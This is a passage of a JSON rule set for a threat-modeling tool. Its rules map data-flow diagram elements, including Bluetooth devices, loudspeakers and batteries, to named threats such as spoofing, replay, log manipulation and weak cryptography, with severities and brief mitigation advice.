process.","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","4f5e6bf4-c9c4-4ea6-9b0e-5c861570e6ec","c46b7c74-5979-409d-8ceb-631b8833c596","3bbe354c-317a-4f76-bdbb-75543b5d5aa4"],"AttackVectorID":"06c24920-2ce3-49ca-8134-9fa81fb2cdef"},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":-1,"NodeTypes":[{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]},{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2","c7598413-4382-43e9-9904-fd9d877eb7a9","04be7cf6-00dd-4aa8-b90b-e9bf105e39e7"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}},{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":1,"PropertyRest":{"ID":"ProvidesSenderAuthenticity","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"c6bc382b-d155-41c4-a41b-959d8a223e54","Name":"Spoofing the receiver process","Description":"The receiver may be spoofed by an attacker and this may lead to information disclosure by the sender. Consider using a standard authentication mechanism to identify the destination process.","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","4f5e6bf4-c9c4-4ea6-9b0e-5c861570e6ec","c46b7c74-5979-409d-8ceb-631b8833c596","3bbe354c-317a-4f76-bdbb-75543b5d5aa4"],"AttackVectorID":"06c24920-2ce3-49ca-8134-9fa81fb2cdef"},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":-1,"NodeTypes":[{"TypeIDs":[]},{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}},{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":1,"PropertyRest":{"ID":"ProvidesReceiverAuthenticity","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"ab65566e-a317-4e67-b647-d79ac948a62b","Name":"Spoofing the external entity","Description":"The external entity may be spoofed by an attacker and this may lead to unauthorized access to the receiver process. Consider using a standard authentication mechanism to identify the external entity.","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","4f5e6bf4-c9c4-4ea6-9b0e-5c861570e6ec","c46b7c74-5979-409d-8ceb-631b8833c596","3bbe354c-317a-4f76-bdbb-75543b5d5aa4"],"AttackVectorID":"06c24920-2ce3-49ca-8134-9fa81fb2cdef"},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":-1,"NodeTypes":[{"TypeIDs":["02b39924-b8f2-44da-a2bc-be1bd2450f68","03e3750c-8549-4589-8269-e0121b3f26a4"]},{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":1,"PropertyRest":{"ID":"ProvidesSenderAuthenticity","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"87e896bb-eb2e-4481-801b-a11d31a4e5e3","Name":"Spoofing of source data store","Description":"The data store may be spoofed by an attacker and this may lead to incorrect data delivered to the receiver. Consider using a standard authentication mechanism to identify the source data store.","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["d0bcd70c-fbad-4a16-a606-8b0682ae7afe","3bbe354c-317a-4f76-bdbb-75543b5d5aa4"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":-1,"NodeTypes":[{"TypeIDs":["c7598413-4382-43e9-9904-fd9d877eb7a9"]},{"TypeIDs":[]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}}]},"Severity":2},{"ID":"38053480-8db1-4185-adcc-9ebb5b913bef","Name":"Spoofing of destination data store","Description":"The data store may be spoofed by an attacker and this may lead to data being written to the attacker\'s target instead of the data store. Consider using a standard authentication mechanism to identify the destination data store.","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["d0bcd70c-fbad-4a16-a606-8b0682ae7afe","3bbe354c-317a-4f76-bdbb-75543b5d5aa4"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":-1,"NodeTypes":[{"TypeIDs":[]},{"TypeIDs":["c7598413-4382-43e9-9904-fd9d877eb7a9"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}}]},"Severity":2},{"ID":"4440ba48-7d42-44cd-b5de-f6664ccc6259","Name":"Replay attack","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"4e007b60-94e7-4df3-b3bd-109eb8627da2","ThreatCategoryIDs":["d0bcd70c-fbad-4a16-a606-8b0682ae7afe","f3fe9ca9-4c34-40fc-a270-3e6252d01e6f"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":-1,"NodeTypes":[{"TypeIDs":[]},{"TypeIDs":[]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":1,"PropertyRest":{"ID":"1fec597f-dfd0-4fcc-b348-828307b946ee","ComparisonType":"==","Value":true}}]},"Severity":2},{"ID":"240eabff-0c74-40e7-9748-d4cc46f59403","Name":"Log manipulation","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"97c0d7a1-13c7-43d5-b03c-75845f973af5","ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","c17cbe5c-3210-42fc-be1e-05f1f915865b"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"c7598413-4382-43e9-9904-fd9d877eb7a9","DetailRestrictions":[{"IsOR":false,"Layer":0,"RestType":1,"PropertyRest":{"ID":"ContainsLogs","ComparisonType":"==","Value":true}},{"IsOR":true,"Layer":0,"RestType":3,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"PhyElementRest":{"Property":{"ID":"IsEncrypted","ComparisonType":"==","Value":false}}}]},"Severity":2},{"ID":"ef5ee1a2-c3b4-492d-b7be-d2285f10107c","Name":"Risks from logging","Description":"Log readers can come under attack via log files. Consider ways to canonicalize data in all logs. Implement a single reader for the logs, if possible, in order to reduce attack surface area. Be sure to understand and document log file elements which come from untrusted sources.","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":true,"Target":-1,"NodeTypes":[{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]},{"TypeIDs":["c7598413-4382-43e9-9904-fd9d877eb7a9"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":1,"IsOR":false,"RestType":1,"PropertyRest":{"ID":"ContainsLogs","ComparisonType":"==","Value":true}}]}},{"ID":"ad30b363-be03-41a8-a422-3ad63cb077b1","Name":"JSON Processing","Description":"If a dataflow contains JSON, JSON processing and hijacking threats may be exploited.","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","f7639a0c-e85b-4947-bbec-2ac4a0911827","f3fe9ca9-4c34-40fc-a270-3e6252d01e6f"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"b395ada9-bc1d-4df9-b9f3-a1b09ee2a5aa","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"758fa1ec-35f3-44a2-9f3d-0e5c21fc92c4","ComparisonType":"==","Value":true}}]},"Severity":2},{"ID":"a727e065-ff95-47d5-8aac-625dfc7a453c","Name":"Cross Site Scripting","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"b48781b2-24a2-481b-b7c1-3390dbeeb973","ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"59076fab-74e3-415a-93f5-fffd12e3d79c","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"47889e58-6875-4fe5-aa04-91ea9054a166","ComparisonType":"==","Value":false}},{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"5afac92d-d86d-49bc-8fd8-84242a651767","ComparisonType":"==","Value":false}}]},"Severity":4},{"ID":"596fe057-9387-4f5c-bd01-ef81613739f4","Name":"Lower trusted subject updates logs","Description":"If you have trust levels, is anyone other outside of the highest trust level allowed to log? Letting everyone write to your logs can lead to repudiation problems. Only allow trusted code to log.","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"97c0d7a1-13c7-43d5-b03c-75845f973af5","ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","c17cbe5c-3210-42fc-be1e-05f1f915865b","a77f314c-f74e-4340-a993-5a1a24f26db4"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":-1,"NodeTypes":[{"TypeIDs":[]},{"TypeIDs":["c7598413-4382-43e9-9904-fd9d877eb7a9"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":1,"IsOR":false,"RestType":1,"PropertyRest":{"ID":"ContainsLogs","ComparisonType":"==","Value":true}},{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}}]},"Severity":2},{"ID":"3517184d-2795-45e8-8dde-667eb7aa8051","Name":"Data logs from unknown source","Description":"If you have trust levels, is anyone other outside of the highest trust level allowed to log? Letting everyone write to your logs can lead to repudiation problems. Only allow trusted code to log.","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"97c0d7a1-13c7-43d5-b03c-75845f973af5","ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","c17cbe5c-3210-42fc-be1e-05f1f915865b","a77f314c-f74e-4340-a993-5a1a24f26db4"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":-1,"NodeTypes":[{"TypeIDs":[]},{"TypeIDs":["c7598413-4382-43e9-9904-fd9d877eb7a9"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":1,"IsOR":false,"RestType":1,"PropertyRest":{"ID":"ContainsLogs","ComparisonType":"==","Value":true}},{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}}]},"Severity":2},{"ID":"ee25afa7-0267-4f20-96bb-9912494a383e","Name":"Insufficient auditing","Description":"Does the log capture enough data to understand what happened in the past? Do your logs capture enough data to understand an incident after the fact? Is such capture lightweight enough to be left on all the time? Do you have enough data to deal with repudiation claims? Make sure you log sufficient and appropriate data to handle a repudiation claims. You might want to talk to an audit expert as well as a privacy expert about your choice of data.","IsActive":true,"RuleGenerationType":2,"Mapping":{"ThreatCategoryIDs":["c17cbe5c-3210-42fc-be1e-05f1f915865b","a77f314c-f74e-4340-a993-5a1a24f26db4"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"a74ba004-2165-4721-9b9b-2ce4b9df88c2","DetailRestrictions":[]}},{"ID":"df93be9d-b184-4ee1-a1d0-4966c03721fc","Name":"Potential data repudiation","Description":"The receiver claims that it did not receive data from a source outside the trust boundary. Consider using logging or auditing to record the source, time, and summary of the received data.","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["c17cbe5c-3210-42fc-be1e-05f1f915865b","a77f314c-f74e-4340-a993-5a1a24f26db4"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":-1,"NodeTypes":[{"TypeIDs":[]},{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}}]},"Severity":1},{"ID":"8cc8d956-c72b-478c-88ba-e3dd362825a1","Name":"External entity potentially denies receiving data","Description":"The receiver claims that it did not receive data from a process on the other side of the trust boundary. Consider using logging or auditing to record the source, time, and summary of the received data.","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["c17cbe5c-3210-42fc-be1e-05f1f915865b","a77f314c-f74e-4340-a993-5a1a24f26db4"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":-1,"NodeTypes":[{"TypeIDs":[]},{"TypeIDs":["02b39924-b8f2-44da-a2bc-be1bd2450f68","03e3750c-8549-4589-8269-e0121b3f26a4"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}}]},"Severity":1},{"ID":"6e270c51-65fe-497d-baaa-e390617e27a6","Name":"Data store denies potentially writing data","Description":"The receiver claims that it did not write data received from an entity on the other side of the trust boundary. Consider using logging or auditing to record the source, time, and summary of the received data.","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["c17cbe5c-3210-42fc-be1e-05f1f915865b","a77f314c-f74e-4340-a993-5a1a24f26db4"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":-1,"NodeTypes":[{"TypeIDs":[]},{"TypeIDs":["c7598413-4382-43e9-9904-fd9d877eb7a9"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}}]}},{"ID":"12c29b20-0467-40ab-9208-2c01d6142eab","Name":"Authorization bypass","Description":"Custom authentication schemes are susceptible to common weaknesses such as weak credential change management, credential equivalence, easily guessable credentials, null credentials, downgrade authentication or a weak credential change management system. Consider the impact and potential mitigations for your custom authentication scheme.","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["c8a14b27-b13f-4358-9f3f-691d01c97c77"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"e0b99432-98a6-4e32-86d7-ca5f58897cc2","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"eb92cc8a-bceb-48a5-b0fd-0894a1d91c5c","ComparisonType":"==","Value":true}}]},"Severity":3},{"ID":"b0d91b9a-111b-464b-8011-3e02defafe1d","Name":"Data store inaccessible","Description":"An external agent prevents access to a data store on the other side of the trust boundary.","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"c7787e71-5c70-462c-9558-ce20e7cfdfe8","ThreatCategoryIDs":["f7639a0c-e85b-4947-bbec-2ac4a0911827","f3fe9ca9-4c34-40fc-a270-3e6252d01e6f","f2b91aaf-7d9f-4baf-8713-13d7625174d9"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":true,"Target":-1,"NodeTypes":[{"TypeIDs":[]},{"TypeIDs":["c7598413-4382-43e9-9904-fd9d877eb7a9"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}}]},"Severity":2},{"ID":"063b7019-22aa-4eb8-8e6f-9f81dbeb513b","Name":"Eavesdropping","Description":"","IsActive":true,"RuleGenerationType":2,"Mapping":{"ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","61d04f2d-83b1-4152-9aba-4ad188eef06d","bcd08af5-29bf-4ed8-ab6c-e311e88f4c84","7bbfe5d3-8a91-4210-99ab-79f670715e61"],"AttackVectorID":"6bf04ffa-1f83-4637-a866-d02ff10d752b"},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"4b7a61d0-c430-48ea-8730-03a81542a5d8","DetailRestrictions":[]},"Severity":3},{"ID":"df2c1c56-e04e-4b33-aae2-e13c9305a370","Name":"Privacy-violating interaction","Description":"","IsActive":true,"RuleGenerationType":2,"Mapping":{"AttackVectorID":"6bf04ffa-1f83-4637-a866-d02ff10d752b","ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","af3ee78e-9e83-4bd1-b9b5-13ec28765518"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"4b7a61d0-c430-48ea-8730-03a81542a5d8","DetailRestrictions":[]},"Severity":3},{"ID":"14a5667b-7aa9-41ef-82d1-c2a4e8e454aa","Name":"Processing of sensitive data","Description":"Personal information such as talks, coughs, etc. is exposed and processed by an external system","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"7dc1eb8e-2312-4b2f-becf-f9725d45cdce","ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596","d6eafa9e-6d9d-42aa-a734-0eb11f25607b","e6ba8518-0074-492c-95e5-ebe89fa601fe","7bbfe5d3-8a91-4210-99ab-79f670715e61"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":true,"Target":0,"NodeTypes":[{"TypeIDs":["4b7a61d0-c430-48ea-8730-03a81542a5d8"]},{"TypeIDs":[]}],"NodeRestrictions":[]},"Severity":4},{"ID":"94f3da7c-2e51-4025-9521-d91bf790cdea","Name":"Exposure of sensitive data","Description":"The loudspeaker discloses sensitive information in the public","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"7dc1eb8e-2312-4b2f-becf-f9725d45cdce","ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596","af3ee78e-9e83-4bd1-b9b5-13ec28765518","7bbfe5d3-8a91-4210-99ab-79f670715e61"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":true,"Target":1,"NodeTypes":[{"TypeIDs":[]},{"TypeIDs":["210ba217-67da-4bda-9063-3c95716eb5b9"]}],"NodeRestrictions":[]},"Severity":4},{"ID":"1cd3c1af-ff49-461f-9f55-fadb851a0893","Name":"Risk of explosion","Description":"The battery may explode","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["bc4b439c-6197-48d3-a308-7fd323d2ea5e","6b8c08cb-3f02-413a-96b4-179bb1f67997","17a04fbd-365f-4345-97f8-88d3c7382ec1"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"1dc32bac-147f-42a4-a13c-44e5b59f7b81","DetailRestrictions":[]},"Severity":3},{"ID":"ea2ba48d-b7f9-42c9-b9d9-f4a9816383b0","Name":"Unsecure mode","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["8a3d81d9-3317-4e5d-88fe-a0e0592295fe","d0bcd70c-fbad-4a16-a606-8b0682ae7afe","f7639a0c-e85b-4947-bbec-2ac4a0911827"],"AttackVectorID":"e58fcbde-e429-4704-9f22-c00d187994bc"},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"c80fa1ff-def0-49b3-ad47-0c9f56c21fe6","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"4338e868-4e3c-4473-ba27-6148e8b1fc0f","ComparisonType":"==","Value":false}}]},"Severity":3},{"ID":"7f6ca653-a703-480c-b5d8-d82243171994","Name":"Missing user authentication","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"d46f6e31-ae41-4d6e-93fc-0e6c3bbb295d","ThreatCategoryIDs":["c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"c80fa1ff-def0-49b3-ad47-0c9f56c21fe6","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"1e3a8fb8-4a34-44be-8168-996a7e0283f1","ComparisonType":"==","Value":false}}]},"Severity":3},{"ID":"289c20cd-ea84-4375-8453-b045b94e1dc6","Name":"Weak cryptographic algorithms","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"a0729a41-bcc9-43d8-9c86-bfb26c64e93c","ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"c80fa1ff-def0-49b3-ad47-0c9f56c21fe6","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"3f4c724d-3d4d-4b6b-9252-ef43b4240d79","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"3a44327d-24d1-4c53-a3ea-7d891fb86f47","Name":"Missing certificate","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["d0bcd70c-fbad-4a16-a606-8b0682ae7afe"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"c80fa1ff-def0-49b3-ad47-0c9f56c21fe6","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"34344cae-d072-4901-a7be-4084a2534b45","ComparisonType":"==","Value":false}}]}},{"ID":"ea738f65-e0e7-4dc1-93b9-8798c4c8eeaf","Name":"Unsecure protocols","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"31f89637-4b8a-41e9-acac-9d012767a424","ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596","8a3d81d9-3317-4e5d-88fe-a0e0592295fe"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"ce3cdda1-0737-468e-83e7-ca20098551d1","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"9ea829dc-59d5-437c-8d24-9908feac2941","ComparisonType":"==","Value":false}}]},"Severity":3},{"ID":"6ffb7af3-466f-4cb7-965e-d60956b2ae7e","Name":"Unsecure SSL/TLS version","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"a0729a41-bcc9-43d8-9c86-bfb26c64e93c","ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"ce3cdda1-0737-468e-83e7-ca20098551d1","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"aa99758d-30a6-4e0f-9d11-1d46c0f43d6c","ComparisonType":"==","Value":false}}]},"Severity":3},{"ID":"b2c6473b-9498-4b23-a02f-13e3818496d0","Name":"Exposes server version","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"6bf04ffa-1f83-4637-a866-d02ff10d752b","ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"ce3cdda1-0737-468e-83e7-ca20098551d1","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"6faf97a0-6039-4b7b-ba7c-6b9ef003ede3","ComparisonType":"==","Value":true}}]},"Severity":1},{"ID":"ca66721c-381d-43a1-9129-7643f04065d3","Name":"Missing patches","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"ce3cdda1-0737-468e-83e7-ca20098551d1","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"defc6bcc-2bc9-457a-abab-666ec78d4f73","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"ff998b64-8348-4f41-8350-22ad07c68448","Name":"Missing web application firewall","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"ce3cdda1-0737-468e-83e7-ca20098551d1","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"6f65b93f-53ad-424f-a81b-4777ad48ec97","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"a1ac559b-0ed9-4e5c-815d-80d6dc23308e","Name":"Unsecure Bluetooth version","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"a0729a41-bcc9-43d8-9c86-bfb26c64e93c","ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"2460a6c9-40e5-44c7-b133-10c6654efd18","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"80419a47-0ac7-488f-b958-da045b67d91f","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"132c57c4-fe66-4c94-95e3-98a67669a4a5","Name":"Unsecure Bluetooth mode","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"04d5f07e-2482-451b-9e24-94cb650da53b","ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c17cbe5c-3210-42fc-be1e-05f1f915865b"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"2460a6c9-40e5-44c7-b133-10c6654efd18","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"cf1429d9-c9e7-4dc4-a54c-42596f246692","ComparisonType":"==","Value":false}}]},"Severity":3},{"ID":"c9be8d05-1ea5-4947-a786-33b505f2c5fd","Name":"Unsecure Bluetooth level","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"a0729a41-bcc9-43d8-9c86-bfb26c64e93c","ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"2460a6c9-40e5-44c7-b133-10c6654efd18","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"a4f10f42-4b29-4cbf-a849-0844b011609b","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"56e4871b-bcb7-48f6-bd9e-5a8273d0b62c","Name":"Network access","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596","8a3d81d9-3317-4e5d-88fe-a0e0592295fe","f7639a0c-e85b-4947-bbec-2ac4a0911827"],"AttackVectorID":"3162421f-ca5b-400d-bbe8-58a510be9abf"},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"59f2fd67-bc38-4447-9c14-d9306283bbe9","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"8fbc9cce-7d30-425a-ac50-c5ca44d206b0","ComparisonType":"==","Value":true}}]},"Severity":3},{"ID":"d9290f90-aa79-432f-92e0-267226771aea","Name":"Outdated protocol","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c17cbe5c-3210-42fc-be1e-05f1f915865b"],"AttackVectorID":"04d5f07e-2482-451b-9e24-94cb650da53b"},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"59f2fd67-bc38-4447-9c14-d9306283bbe9","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"f7509951-f156-4774-89e9-1966b03ef03e","ComparisonType":"==","Value":false}}]},"Severity":3},{"ID":"961c5b9f-ea27-48ec-b526-514636536540","Name":"Weak cryptographic algorithms","Description":"Some Bluetooth versions use weak cryptographic 